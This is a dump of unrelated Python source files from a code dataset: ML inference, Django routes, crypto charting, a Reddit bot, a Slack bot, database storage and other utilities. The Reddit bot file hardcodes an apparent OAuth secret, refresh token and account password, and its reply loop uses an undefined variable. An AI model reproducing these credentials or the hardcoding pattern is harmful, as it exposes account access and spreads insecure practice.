post-processing setting.\nscore_param = [0.8]\ninterarea_param = [0.1]\narea_param = [25]\n\nfor score_thres, area_inter_thres, area_threshold in zip(score_param, interarea_param, area_param):\n output = []\n for d in dataset_dicts:\n im = cv2.imread(d[\"file_name\"])\n # model output\n outputs = predictor(im)\n instances = outputs['instances']\n n = os.path.split(d[\"file_name\"])[1]\n image_id = n[:-4]\n\n # initial variables\n j = 0\n all_mask = None\n all_mask_no_refine = None\n # if model no prediction in this image, out = ''\n if(len(instances) < 1):\n out = ''\n output.append([image_id, out])\n else:\n # model predictions >= 1\n instances.pred_masks = instances.pred_masks.detach().cpu().numpy()\n\n for i in range(len(instances.pred_masks)):\n # if confidence < threshold\n if(instances.scores[i] < score_thres):\n j = j + 1\n continue\n else:\n # fill holes\n mask_int = ndimage.morphology.binary_fill_holes(instances.pred_masks[i].copy()).astype(np.uint8)\n # mask to [truth, false] value\n mask = mask_int > 0\n # original mask\n mask_orig = instances.pred_masks[i] > 0\n\n # init all_mask & all_mask_no_refine = False (size = mask), run only once.\n if all_mask is None:\n all_mask = mask.copy() # make same size\n all_mask[:] = False # setting all False\n all_mask_no_refine = mask_orig.copy()\n all_mask_no_refine[:] = False\n\n # intersection mask and all_mask\n intersection = mask & all_mask\n # sum intersection area\n area_inter = intersection.sum()\n # if this mask intersect to all_mask, and > 0.3 * mask area, ignore it!\n if area_inter > 0:\n total_area = mask.sum()\n if float(area_inter) / (float(total_area) + 0.00001) > area_inter_thres:\n j = j + 1\n continue\n\n # no intersection area < threshold, ignore it!\n mask = mask & ~all_mask\n if mask.sum() < area_threshold:\n j = j + 1\n continue\n\n # setting mask_int no mask area = 0\n mask_int[~mask] = 0\n # add this mask to all_masks\n all_mask = mask | all_mask\n all_mask_no_refine = all_mask_no_refine | mask_orig\n # mask to [0, 1] value\n m = mask_int * 1\n # mask to RLE-code\n out = rle_encoding(m)\n s = str(out)\n s = s.replace('[', '')\n s = s.replace(']', '')\n s = s.replace(',', '')\n output.append([image_id, s])\n\n # prediction score_thres, area_inter_thres, area_threshold all no legal\n if(j == len(instances.pred_masks)):\n out = ''\n output.append([image_id, out])\n\n # write csv file.\n submission = pd.DataFrame(output, columns=['ImageId', 'EncodedPixels']).astype(str)\n submission = submission[submission['EncodedPixels'] != 'nan']\n submission_filepath = os.path.join('./final_dataset/Result', 'submission_{}_{}_{}.csv'.format(score_thres, area_threshold, area_inter_thres))\n submission.to_csv(submission_filepath, index=None, encoding='utf-8')\n\n","sub_path":"Final-Project-Testing.py","file_name":"Final-Project-Testing.py","file_ext":"py","file_size_in_byte":4881,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"651459083","text":"from django.urls import path\nfrom . import views\n\nurlpatterns = [\n\t# Url para Página Inicial\n\tpath('', views.index, name='index'),\n\n\t# Urls Área\n\tpath('area/', views.lista_area, name='lista_area'),\n\tpath('area/', views.detalhes_area, name='detalhes_area'),\n\tpath('area/add', views.adicionar_area, name='adicionar_area'),\n\tpath('area//editar/', views.alterar_area, name='alterar_area'),\n\tpath('area//excluir/', views.excluir_area, name='excluir_area'),\n\tpath('area//ativar/', views.ativar_area, name='ativar_area'),\n\tpath('area//desativar/', views.desativar_area, name='desativar_area'),\n\n\t# Urls Notícia\n\tpath('noticias/', views.lista_noticia, name='lista_noticia'),\t\n\tpath('noticia//', views.detalhes_noticia, name='detalhes_noticia'),\t\n\tpath('noticia/add', views.adicionar_noticia, name='adicionar_noticia'),\n\tpath('noticia//editar/', views.alterar_noticia, name='alterar_noticia'),\n\tpath('noticia//excluir/', views.excluir_noticia, name='excluir_noticia'),\n\tpath('noticia//publicar/', views.publicar_noticia, name='publicar_noticia'),\n]","sub_path":"portal/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1114,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"392480551","text":"import base64\nimport datetime\nimport io\nimport os\nimport sys\n\nimport matplotlib\n\nmatplotlib.use('agg')\n\nimport mplfinance as mpf\nimport pandas as pd\nimport pandas_ta as ta\n\nfrom matplotlib.backends.backend_agg import FigureCanvasAgg as FigureCanvas\n\nfrom matplotlib import pyplot as plt\n\nfrom coin_data import CoinData\n\nplt.style.use('dark_background')\nimport numpy as np\nimport numba as nb\nimport csv\n\nfrom binance.client import Client\n\nclient = Client(os.getenv('bbot_pub'), os.getenv('bbot_sec'))\n\ndata_dict = {}\n\ndef read_data():\n with open('recent_trades.csv', newline='') as f:\n trade_reader = csv.reader(f, delimiter=' ', quotechar='|')\n for row in trade_reader:\n if row:\n # print()\n if row[1] not in data_dict.keys():\n data_dict[row[1]] = [[row[0]] + row[2:]]\n else:\n data_dict[row[1]].append([row[0]] + row[2:])\n return data_dict\n\n\n@nb.jit(fastmath=True, nopython=True)\ndef calc_rsi( array, deltas, avg_gain, avg_loss, n ):\n\n # Use Wilder smoothing method\n up = lambda x: x if x > 0 else 0\n down = lambda x: -x if x < 0 else 0\n i = n+1\n for d in deltas[n+1:]:\n avg_gain = ((avg_gain * (n-1)) + up(d)) / n\n avg_loss = ((avg_loss * (n-1)) + down(d)) / n\n if avg_loss != 0:\n rs = avg_gain / avg_loss\n array[i] = 100 - (100 / (1 + rs))\n else:\n array[i] = 100\n i += 1\n\n return array\n\ndef get_rsi( array, n = 14 ):\n\n deltas = np.append([0],np.diff(array))\n\n avg_gain = np.sum(deltas[1:n+1].clip(min=0)) / n\n avg_loss = -np.sum(deltas[1:n+1].clip(max=0)) / n\n\n array = np.empty(deltas.shape[0])\n array.fill(np.nan)\n\n array = calc_rsi( array, deltas, avg_gain, avg_loss, n )\n return array\n\nclass Charts:\n\n def __init__(self, symbol='BTCUSDT', tf='1h', entry=None, direction=None):\n \"\"\"When initialised, creates chart for given symbol and timeframe\n :param symbol: str uppercase eg. 'BTCUSDT'\n :param tf: str lowercase eg. '1m', '15m', '1h', '4h'\n :param entry: float if open positions\n :param direction: str 'LONG', 'SHORT' or None depending on position\"\"\"\n self.symbol = symbol.upper()\n self.tf = tf\n self.df = CoinData.get_dataframe(self.symbol, self.tf)\n self.df = self.df_ta()\n self.entry = entry\n self.direction = True if direction == 'LONG' else False\n self.tp = 0.03\n self.sl = 0.01\n\n def df_ta(self) -> pd.DataFrame:\n df = self.df\n # df['rsi'] = ta.rsi(df.close, 14)\n df['rsi'] = get_rsi(df.close, 14)\n df = pd.concat((df, ta.macd(df.close, 12, 26, 9)), axis=1)\n df['ema_20'], df['ema_50'] = ta.ema(df.close, 20), ta.ema(df.close, 50)\n if len(df) >= 288:\n df['ema_200'] = ta.ema(df.close, 200)\n else:\n df['ema_200'] = ta.ema(df.close, len(df.close) - 3)\n df = df.tail(88)\n return df\n\n def trades_series(self, symbol):\n d = read_data()\n for key in d.keys():\n if key == symbol:\n trades = [{'datetime': datetime.datetime.strptime(d[symbol][i][0], \"%Y-%m-%d %H:%M:%S.%f\"), 'price': d[symbol][i][2]} for i in range(len(d[symbol]))]\n df = pd.DataFrame(trades)\n df.set_index('datetime', inplace=True)\n df.rename_axis('date', inplace=True)\n return df\n\n @staticmethod\n def get_rsi_timeseries(prices, n=14):\n # RSI = 100 - (100 / (1 + RS))\n # where RS = (Wilder-smoothed n-period average of gains / Wilder-smoothed n-period average of -losses)\n # Note that losses above should be positive values\n # Wilder-smoothing = ((previous smoothed avg * (n-1)) + current value to average) / n\n # For the very first \"previous smoothed avg\" (aka the seed value), we start with a straight average.\n # Therefore, our first RSI value will be for the n+2nd period:\n # 0: first delta is nan\n # 1:\n # ...\n # n: lookback period for first Wilder smoothing seed value\n # n+1: first RSI\n\n # First, calculate the gain or loss from one price to the next. The first value is nan so replace with 0.\n deltas = (prices - prices.shift(1)).fillna(0)\n\n # Calculate the straight average seed values.\n # The first delta is always zero, so we will use a slice of the first n deltas starting at 1,\n # and filter only deltas > 0 to get gains and deltas < 0 to get losses\n avg_of_gains = deltas[1:n + 1][deltas > 0].sum() / n\n avg_of_losses = -deltas[1:n + 1][deltas < 0].sum() / n\n\n # Set up pd.Series container for RSI values\n rsi_series = pd.Series(0.0, deltas.index)\n\n # Now calculate RSI using the Wilder smoothing method, starting with n+1 delta.\n up = lambda x: x if x > 0 else 0\n down = lambda x: -x if x < 0 else 0\n i = n + 1\n for d in deltas[n + 1:]:\n avg_of_gains = ((avg_of_gains * (n - 1)) + up(d)) / n\n avg_of_losses = ((avg_of_losses * (n - 1)) + down(d)) / n\n if avg_of_losses != 0:\n rs = avg_of_gains / avg_of_losses\n rsi_series[i] = 100 - (100 / (1 + rs))\n else:\n rsi_series[i] = 100\n i += 1\n\n return rsi_series\n\n\n def main_chart(self):\n fig, axes = plt.subplots(nrows=3, ncols=1, gridspec_kw={'height_ratios': [3, 1, 1]})\n fig.suptitle(f\"{self.symbol} {self.tf}\", fontsize=16)\n ax_r = axes[0].twinx()\n mc = mpf.make_marketcolors(up='#00e600', down='#ff0066',\n edge={'up': '#00e600', 'down': '#ff0066'},\n wick={'up': '#00e600', 'down': '#ff0066'},\n volume={'up': '#808080', 'down': '#4d4d4d'},\n ohlc='black')\n s = mpf.make_mpf_style(marketcolors=mc)\n ax_r.set_alpha(0.01)\n axes[0].set_zorder(2)\n for ax in axes:\n ax.set_facecolor((0, 0, 0, 0))\n ax_r.set_zorder(1)\n\n axes[1].set_ylabel('RSI')\n axes[1].margins(x=0, y=0.1)\n axes[0].margins(x=0, y=0.05)\n axes[2].set_ylabel('MACD')\n ax_r.set_ylabel('')\n ax_r.yaxis.set_visible(False)\n axes[2].margins(0, 0.05)\n axes[0].xaxis.set_visible(False)\n axes[1].xaxis.set_visible(False)\n\n axes[0].yaxis.tick_left()\n axes[0].yaxis.set_label_position('right')\n axes[1].yaxis.set_label_position('right')\n axes[2].yaxis.set_label_position('right')\n plt.tight_layout()\n fig.autofmt_xdate()\n self.df.volume = self.df.volume.div(2)\n addplot_200 = mpf.make_addplot(self.df['ema_200'], type='line', ax=axes[0], width=1, color='#ff0066')\n addplot_50 = mpf.make_addplot(self.df['ema_50'], type='line', ax=axes[0], width=1, color='#00e600')\n addplot_trades = mpf.make_addplot(self.trades_series(self.symbol), type='scatter', ax=axes[0], width=5, color='#fff')\n mpf.plot(self.df, ax=axes[0], type=\"candle\", style=s, volume=ax_r, ylabel='', addplot=[addplot_200, addplot_50])\n max_vol = max({y for index, y in self.df.volume.items()})\n ax_r.axis(ymin=0, ymax=max_vol * 3)\n self.df['rsi'].plot(ax=axes[1], legend=False, use_index=True, sharex=axes[0], color='#00e600')\n self.df['MACD_12_26_9'].plot(ax=axes[2], legend=False, use_index=True, sharex=axes[0], color='#00e600')\n self.df['MACDs_12_26_9'].plot(ax=axes[2], legend=False, use_index=True, sharex=axes[0], color='#ff0066')\n axes[2].axhline(0, color='gray', ls='--', linewidth=1)\n axes[1].axhline(70, color='gray', ls='--', linewidth=1)\n axes[1].axhline(30, color='gray', ls='--', linewidth=1)\n if self.entry:\n tp = self.entry + self.entry * self.tp if self.direction else self.entry - self.entry * self.tp\n sl = self.entry - self.entry * self.sl if self.direction else self.entry + self.entry * self.sl\n tp_color = 'red' if self.direction else 'green'\n sl_color = 'red' if not self.direction else 'green'\n axes[0].axhline(self.entry, color='yellow', ls=\"--\", linewidth=.5)\n axes[0].axhline(tp, color=tp_color, ls=\"--\", linewidth=.5)\n axes[0].axhline(sl, color=sl_color, ls=\"--\", linewidth=.5)\n axes[2].set_xlabel('')\n img = io.BytesIO()\n FigureCanvas(fig).print_png(img)\n plot_url = base64.b64encode(img.getvalue()).decode()\n fig.savefig('plot.png', format='png')\n plt.close(fig)\n return plot_url\n\n # def plot_rsi_div(self):\n # rsi_array = np.array(self.df['rsi'].tail(20).array)\n # close_array = np.array(self.df['close'].tail(20).array)\n # rsi_peaks, _ = scipy.signal.find_peaks(rsi_array)\n # rsi_troughs, _ = scipy.signal.find_peaks(-rsi_array)\n # fig, (ax1, ax2) = plt.subplots(2, sharex=True)\n # fig.suptitle(f'{self.symbol} RSI Divergence {self.tf}')\n # ax1.set_ylabel('Close')\n # ax2.set_ylabel('RSI')\n # ax2.axhline(70, color='gray', ls='--')\n # ax2.axhline(30, color='gray', ls='--')\n # ax1.xaxis.set_visible(False)\n # ax2.xaxis.set_visible(False)\n # ax1.plot(close_array)\n # ax2.plot(rsi_array, color='green')\n # ax1.plot(rsi_peaks, close_array[rsi_peaks], '.', color=\"#ff0066\")\n # ax2.plot(rsi_peaks, rsi_array[rsi_peaks], '.', color=\"#ff0066\")\n # ax1.plot(rsi_troughs, close_array[rsi_troughs], '.', color=\"#00e600\")\n # ax2.plot(rsi_troughs, rsi_array[rsi_troughs], '.', color=\"#00e600\")\n # _, new_close_array, new_rsi_array, indices = self.rsi_divergence()\n # if len(close_array) != len(new_close_array):\n # ax1.plot(indices, new_close_array, color=\"#ff0066\")\n # ax2.plot(indices, new_rsi_array, color=\"#ff0066\")\n # img = io.BytesIO()\n # fig.savefig(img, format='png')\n # img.seek(0)\n # plot_url = base64.b64encode(img.getvalue()).decode()\n # plt.close()\n # return plot_url\n\n def plot_charts(self):\n self.main_chart()\n # self.plot_rsi_div()\n\n\nif __name__ == '__main__':\n c = Charts('SNXUSDT', '15m')\n print('plotting charts')\n c.plot_charts()\n print('done')\n sys.exit()\n # print(Charts('SNXUSDT', '15m').trades_series('SNXUSDT'))\n","sub_path":"analysis/chart.py","file_name":"chart.py","file_ext":"py","file_size_in_byte":10505,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"588993880","text":"app_ua = 'Script that helps users and get information about Wargame on the /r/Wargame subreddit, made by /u/MatthewBetts'\napp_id = 'IQ6psQuqn9oZQg'\napp_secret = 'm-OZWaMw1ZKxLRx5ZYTPfu5vbEg'\napp_uri = 'https://127.0.0.1:65010/authorize_callback'\napp_scopes = 'account creddits edit flair history identity livemanage modconfig modcontributors modflair modlog modothers modposts modself modwiki mysubreddits privatemessages read report save submit subscribe vote wikiedit wikiread'\napp_account_code = 'rLzgSz3xKQgFwH0kg5f9It9EsY0'\napp_refresh = '43384807--w0i40wcH0VwYFsVhn3rPR-5oUY' \n\nimport praw\nimport time\nimport sqlite3\n\nUSERAGENT = 'Script that helps users and get information about Wargame on the /r/Wargame subreddit, made by /u/MatthewBetts'\nUSERNAME = 'WargameBot'\nPASSWORD = 'be565f2b2236412'\nSUBREDDIT = \"wargame\"\nMAXPOSTS = 10\n\nSETPHRASES = [\"I'm a new player\",\"new here\",\"\"]\nSETRESPONSE = \"Hi, you've found out my test phrase! Well done!\"\n\nWAIT = 20\n \nprint('Opening Database')\nsql = sqlite3.connect('sql.db')\ncur = sql.cursor()\ncur.execute('CREATE TABLE IF NOT EXISTS oldposts(ID TEXT)')\nsql.commit\n\n#def login():\nprint('Logging in...')\nr = praw.Reddit(app_ua)\nr.set_oauth_app_info(app_id, app_secret, app_uri)\nr.refresh_access_information(app_refresh)\nprint('Logged in.')\n#return r\n\t\ndef reply():\n print('Fetching subreddit ' + SUBREDDIT)\n subreddit = r.get_subreddit(SUBREDDIT)\n print('Fetching Comments')\n comments = subreddit.get_comments(limit=MAXPOSTS)\n cur.execute('SELECT * FROM oldposts WHERE ID=?', [comment.id])\n if not cur.fetchone():\n try:\n cauthor = comment.author.name\n if cauthor.lower() != USERNAME.lower():\n cbody = comment.body.lower()\n if any(key.lower() in cbody for key in SETPHRASES):\n print('Replying to /u/' + cauthor)\n comment.reply(SETRESPONSE)\n except AttributeError:\n pass\t \n cur.execute('INSERT INTO oldposts VALUES(?)', [comment.id])\n sql.commit()\n\t\t\t\t\t\nwhile True:\n reply()\n print('Waiting 20 seconds')\n time.sleep(WAIT)\n#f.close()\n \n\t#with open('Unit_File.csv', 'r') as f:\n # for comment in comments:\n # cbody = comment.body.lower()\n # for row in csv.reader(f):\n # if cbody == row[1]:\n # comment.reply(row[1])\n # break\n # else: # no match\n # print('No match for /u/' + cauthor)\n\t\n#with open('RedditBot.csv', 'w') as csvfile:\n # fieldnames = ['Unit', 'Image_link']\n#with open('RedditBot.csv', newline='') as f:\n# reader = csv.reader(f)\n # for row in reader:\n # if comment == :\n#\t\tprint(row)\n\t\n#sqlite3 Wargame_Units.db\n\n#CREATE DATABASE Wargame_Units;\n#CREATE TABLE Units\n#(\n#UnitName varchar(255),\n#ImgurLink varchar(255),\n#);\n#BULK INSERT TmpStList FROM 'c:\\RedditBot\\RedditBot.txt' WITH (FIELDTERMINATOR = ',') \n#SELECT IMGUR_LINK FROM Units\n#WHERE UnitName=WHATEVER_NAME_THEY_ENTERED;\t","sub_path":"WargameBot.py","file_name":"WargameBot.py","file_ext":"py","file_size_in_byte":3073,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"175874847","text":"\"\"\"\n data_set : 전체 데이터 셋(label 특징 포함)\n feature_names : 특징 이름\n feature_type : 특징 유형('categorical', 'numerical', 'numerical', 'label')\n -> 여기서는 discretization을 수행한 특징 셋이기 때문에 클래스를 제외한 나머지는 카테고리로 분류함\n\n 데이터 업로드 -> 전처리 -> CBA 룰 추출 -> 룰 출력\n\"\"\"\nimport cba.cba_rg as cba_rg\nimport pandas as pd\n\nprint(\"\\nData set Upload\")\nTD_misuse_data = pd.read_csv('F:/data/ADD/201023_data/disc_data.csv')\nTD_misuse_data = TD_misuse_data.to_numpy()\n\nprint(\"\\nCBA - Make Rule\")\nminsup = 0.1\nminconf = 0.1\ncars = cba_rg.rule_generator(TD_misuse_data, minsup, minconf)\n\nprint(\"\\nCARs:\")\ncars.print_rule()","sub_path":"201023_project/misuse_test.py","file_name":"misuse_test.py","file_ext":"py","file_size_in_byte":730,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"624349545","text":"\"\"\"Exception type for non-existent argument-name accesses.\"\"\"\n\nfrom typing import Tuple\n\nfrom .base_argument_error import BaseArgumentError\nfrom ..generic_errors import AlmanacKeyError\n\n\nclass NoSuchArgumentError(BaseArgumentError, AlmanacKeyError):\n \"\"\"An exception type for resolutions of non-existent arguments.\"\"\"\n\n def __init__(\n self,\n *names: str\n ) -> None:\n if not names:\n msg = 'No such argument with specified name.'\n elif len(names) == 1:\n msg = f'No such argument with name {names[0]}.'\n elif len(names) == 2:\n msg = f'No arguments exist with the name {names[0]} or {names[1]}.'\n else:\n joined_names = ','.join(names[:-1]) + f', or {names[-1]}'\n msg = f'No arguments exist with the name {joined_names}.'\n\n super().__init__(msg)\n self._names = names\n\n @property\n def names(\n self\n ) -> Tuple[str, ...]:\n \"\"\"A tuple of the argument names that triggered this error.\"\"\"\n return self._names\n","sub_path":"almanac/errors/argument_errors/no_such_argument_error.py","file_name":"no_such_argument_error.py","file_ext":"py","file_size_in_byte":1049,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"474496949","text":"import argparse, pprint, re, csv\nfrom lib.edwf2 import EDWF\nfrom lib.phr_ex import phrase_extraction\nfrom lib.explain2_fast import getCorrespondences\n\n\"\"\"\n===================== Global arguments section =================================\n\"\"\"\n\nparser = argparse.ArgumentParser(description='Apertium translation parts')\nparser.add_argument('sourceLanguage', help='source language')\nparser.add_argument('targetLanguage', help='target language')\n\nparser.add_argument('source_input_file', help='Source text, input') \nparser.add_argument('mt_input_file', help='Hypothesis file, input')\nparser.add_argument('pe_input_file', help='Postedited output file, input')\nparser.add_argument('fmt', help='Fuzzy Match Threshold', type=float)\n\nparser.add_argument('-m', '--maxSourceLength', help='maximum length of whole-word subsegments (for source text)', type=int, default=5)\nparser.add_argument('-M', '--maxTranslationLength', help='maximum length of whole word subsegments (for translated text)', type=int, default=5)\nparser.add_argument('-d', '--directory', help='directory of Apertium language pair', default=None)\nparser.add_argument('-t', '--table', help='prints reference table of characters', action='store_true', default=False)\nparser.add_argument('-i', '--ignoreCase', help='ignore case in analyses (use lower always)', action='store_true', default=False)\nparser.add_argument('-o', '--output', help='output file', default=None)\n\nargs = parser.parse_args()\n\n\"\"\"\n===================== Main code section =================================\n\"\"\"\n\n\ndef calculate_distance(source, mt, pe):\n source_tuple = tuple((source.strip()).split())\n mt_tuple = tuple((mt.strip()).split())\n pe_tuple = tuple((pe.strip()).split())\n\n ed_algorithm = EDWF(mt_tuple, pe_tuple)\n distance = ed_algorithm.get_distance() * 1.0\n\n return ed_algorithm, distance, mt_tuple, pe_tuple\n\n\ndef create_opA(mt, pe, alignment):\n opA = set()\n\n for pair, mt, pe in phrase_extraction(mt.strip(), pe.strip(), alignment):\n print(pair, mt, pe)\n opA.add((mt.strip(), pe.strip()))\n\n return opA\n\n\ndef create_opB(correspondences):\n opB = set()\n\n for s, t, i, j, k, l in correspondences:\n t = re.sub(\"\\s+\", \" \", t)\n opB.add((s, t))\n\n return opB\n\n\ndef find_intersection(opA, opB):\n posteditops = []\n\n for s, t in opB:\n for hyp, ref in opA:\n if t == hyp:\n posteditops.append((s, t, ref))\n\n return posteditops\n\n\ndef extract_operations(ed_algorithm, source, mt, pe):\n alignment = ed_algorithm.get_alignment()\n print(alignment)\n\n opA = create_opA(mt, pe, alignment)\n #print(opA)\n\n correspondences = getCorrespondences(\n args.sourceLanguage,\n args.targetLanguage,\n args.ignoreCase,\n args.maxSourceLength,\n args.directory,\n args.maxTranslationLength,\n source.strip())\n\n opB = create_opB(correspondences)\n\n posteditops = find_intersection(opA, opB)\n\n return posteditops\n\n\ndef write_operations(posteditops):\n if args.output:\n with open(args.output, 'w', encoding='utf-8') as file:\n for source, mt, pe in posteditops:\n file.write(\"\\\"%s\\\",\\\"%s\\\",\\\"%s\\\"\\n\" % (source, mt, pe))\n else:\n print(\"\\\"%s\\\",\\\"%s\\\",\\\"%s\\\"\\n\" % (source, mt, pe))\n\n\ndef main():\n posteditops = []\n\n source_input = open(args.source_input_file, \"r\")\n mt_input = open(args.mt_input_file, \"r\")\n pe_input = open(args.pe_input_file, \"r\")\n\n #print(source_input)\n\n for source, mt, pe in zip(source_input, mt_input, pe_input):\n ed_algorithm, distance, mt_tuple, pe_tuple = calculate_distance(source, mt, pe)\n #print(source, mt, pe)\n\n if 1.0 - distance / max(len(mt_tuple), len(pe_tuple)) > 1.0 * args.fmt:\n try:\n posteditops += extract_operations(ed_algorithm, source, mt, pe)\n except:\n print(source, mt, pe)\n \n write_operations(posteditops)\n\n source_input.close()\n mt_input.close()\n pe_input.close()\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"automatic_postediting/cleaned_learn_postedits.py","file_name":"cleaned_learn_postedits.py","file_ext":"py","file_size_in_byte":4057,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"32418240","text":"\"\"\"Main file for analyzing and plotting molecular dynamics simulation data.\n\nThis program reads in a set of molecular geometry and energy data output by a\nmolecular simulation and computes and plots resulting ensemble data.\n\nNo guarantees are made that the results of this program are correct and the\nauthor assumes no liability for their reliability.\n\"\"\"\n\nimport mmlib\n\n__author__ = 'Trent M. Parker'\n__email__ = 'tmpchemistry@gmail.com'\n__status__ = 'Prototype'\n__date__ = '2017-02-22'\n\nif __name__ == '__main__':\n # check input syntax\n infile_name = mmlib.fileio.ValidateInput(__file__)\n\n # read in ensemble geometry and energy data\n ana = mmlib.analyze.Analysis(infile_name)\n\n # compute and plot ensemble properties\n ana.RunAnalysis()\n","sub_path":"scripts/molecular_mechanics/ana.py","file_name":"ana.py","file_ext":"py","file_size_in_byte":745,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"142005686","text":"# -*- coding: utf-8 -*-\n\n#in project directory, run\n#celery -A proj worker --app=celery_app.celery_app\n\nfrom celery import Celery\n\nbroken_url = 'redis://127.0.0.1:6379/0'\nbackend = broken_url\n\ncelery_app = Celery('proj', broker=broken_url, backend=backend)\ncelery_app.conf.CELERY_TASK_SERIALIZER = 'json'\n\n\nif __name__ == \"__main__\":\n celery_app.start()","sub_path":"celery_app.py","file_name":"celery_app.py","file_ext":"py","file_size_in_byte":356,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"49254039","text":"#!/usr/bin/python3\n\"\"\" SQL db \"\"\"\nfrom os import getenv\nfrom sqlalchemy import create_engine\nfrom sqlalchemy.orm import sessionmaker, scoped_session\nfrom models.user import User\nfrom models.city import City\nfrom models.state import State\nfrom models.amenity import Amenity\nfrom models.place import Place\nfrom models.review import Review\nfrom models.base_model import Base\n\n\nclass DBStorage:\n \"\"\" db \"\"\"\n __engine = None\n __session = None\n\n def __init__(self):\n user = getenv('HBNB_MYSQL_USER')\n pwd = getenv('HBNB_MYSQL_PWD')\n host = getenv('HBNB_MYSQL_HOST')\n db = getenv('HBNB_MYSQL_DB')\n env = getenv('HBNB_ENV')\n\n self.__engine = create_engine('mysql+mysqldb://{}:{}@{}/{}'\n .format(user, pwd, host, db),\n pool_pre_ping=True)\n\n if env == \"test\":\n Base.metadata.drop_all(self.__engine)\n\n def all(self, cls=None):\n \"\"\" Show all class objects in DB storage or specified class \"\"\"\n if cls:\n objects = self.__session.query(cls).all()\n else:\n classes = [State, City] # , User, Place, Review, Amenity]\n objects = []\n for c in classes:\n objects += self.__session.query(c)\n return {\"{}.{}\".format(type(obj).__name__, obj.id): obj for obj in\n objects}\n\n def new(self, obj):\n \"\"\" Add the object to the current DB session \"\"\"\n if obj:\n self.__session.add(obj)\n\n def save(self):\n \"\"\"Commit\"\"\"\n self.__session.commit()\n\n def delete(self, obj=None):\n \"\"\" Delete object from current DB session \"\"\"\n if obj:\n self.__session.delete(obj)\n\n def reload(self):\n \"\"\" Reload all tables and session from the engine \"\"\"\n Base.metadata.create_all(self.__engine)\n self.__session = sessionmaker(bind=self.__engine,\n expire_on_commit=False)\n Session = scoped_session(self.__session)\n self.__session = Session()\n\n def close(self):\n \"\"\" Close Session \"\"\"\n self.__session.close()\n","sub_path":"models/engine/db_storage.py","file_name":"db_storage.py","file_ext":"py","file_size_in_byte":2168,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"410794313","text":"import subprocess\nimport calm_execute as calm\n\nclass Command(object):\n def __init__(self):\n self.commands = {\n \"apps\" : self.apps,\n \"build\" : self.build,\n \"delete\" :self.delete,\n \"help\" : self.help\n }\n\n def handle_command(self, user, command):\n response = \"<@\" + user + \">: \"\n command = command.split()\n\n if command[0] in self.commands:\n response += self.commands[command[0]](command)\n else:\n response += \"Sorry I don't understand the command: \" + command[0] + \". \" + self.help()\n\n return response\n\n def apps(self, command):\n response = calm.apps_list()\n myReturn = \"\"\n\n if len(response) > 0:\n for item in response:\n myReturn += \"{0}, \".format(item[\"name\"])\n\n myReturn = myReturn[:-2]\n myReturn = \"The running applications are: {0}\".format(myReturn)\n\n else:\n myReturn = \"No applications found. {}\".format(response)\n\n return myReturn\n\n def build(self, command):\n try:\n appName = command[2]\n appVar = command[3]\n cloud = command[4]\n except:\n return \"Sorry, not enough arguments.\"\n\n if command[1] == \"pet\":\n response = calm.create_pet(appName, appVar, cloud)\n\n elif command[1] == \"swarm\":\n response = calm.create_swarm(appName, appVar, cloud)\n\n else:\n return \"I'm sorry. That's an unknown application.\"\n\n if len(response) > 0:\n myReturn = response\n else:\n myReturn = \"Unable to build {0} on cloud {1}\".format(appName, cloud)\n\n return myReturn\n\n def delete(self, command):\n if len(command) < 2:\n return \"{} requrires an app name.\".format(command[0])\n\n response = calm.delete(command[1])\n\n if len(response) > 0:\n myReturn = response\n else:\n myReturn = \"No applications found. {}\".format(response)\n\n return myReturn\n\n def help(self, command):\n response = \"I support the following commands:\\r\\n\"\n\n for command in self.commands:\n response += command + \"\\r\\n\"\n\n return response\n","sub_path":"python_slack_bot/command.py","file_name":"command.py","file_ext":"py","file_size_in_byte":2252,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"208857513","text":"#!/usr/bin/python2.5\n#\n# Copyright 2008 Google Inc. All Rights Reserved.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\n\"\"\"Custom template tags for base.html of the Pabla demo app.\"\"\"\n\n__author__ = 'Fred Wulff'\n\nfrom google.appengine.api import users\nfrom google.appengine.ext.webapp import template\n\n\n# Get the template Library\nregister = template.create_template_register()\n\n\n@register.inclusion_tag('user_link.html')\ndef render_user_link(current_uri):\n \"\"\"Renders a link that the user can use to log into or out of Google account.\n\n This is a custom tag since it's included in the header of virtually every\n page served by Pabla, and we don't want to force views to pass the user in\n the template context every time.\n\n Args:\n current_uri: the uri of the page currently being rendered\n\n Returns:\n A link that allows the user to log in or out.\n \"\"\"\n user = users.get_current_user()\n\n # Note: Here we return a dict that serves at the context for the\n # template indicated in the method decorator.\n if user is None:\n url = users.create_login_url(current_uri)\n return {'authenticated': False,\n 'url': url}\n else:\n url = users.create_logout_url(current_uri)\n return {'authenticated': True,\n 'username': user.nickname(),\n 'url': url}\n","sub_path":"python/app_gallary/pabla/templatetags/basetags.py","file_name":"basetags.py","file_ext":"py","file_size_in_byte":1794,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"136949579","text":"from OSUT3Analysis.Configuration.configurationOptions import *\nfrom 